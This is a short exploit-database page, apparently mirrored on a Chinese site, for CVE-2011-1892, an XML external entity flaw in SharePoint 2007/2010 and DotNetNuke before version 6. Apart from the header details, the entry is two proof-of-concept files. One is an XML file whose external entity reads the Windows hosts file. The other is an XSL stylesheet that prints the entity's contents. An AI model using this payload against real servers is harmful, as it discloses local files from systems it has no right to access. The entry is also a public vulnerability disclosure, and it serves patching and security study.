SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

Exploit Database
122 阅读

作者： Nicolas Gregoire

日期： 2011-09-20
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/17873/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke

Date: September 15, 2011

Author: Nicolas Gregoire

Version: SharePoint 2007 / 2010, DotNetNuke < 6

CVE : CVE-2011-1892

poc filename: xee.xml

<!DOCTYPE doc [

<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">

]>

<doc>&boom;</doc>

poc filename: xee.xsl

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">

<xsl:apply-templates/>

<xsl:value-of select="doc"/>

</xsl:template>

</xsl:stylesheet>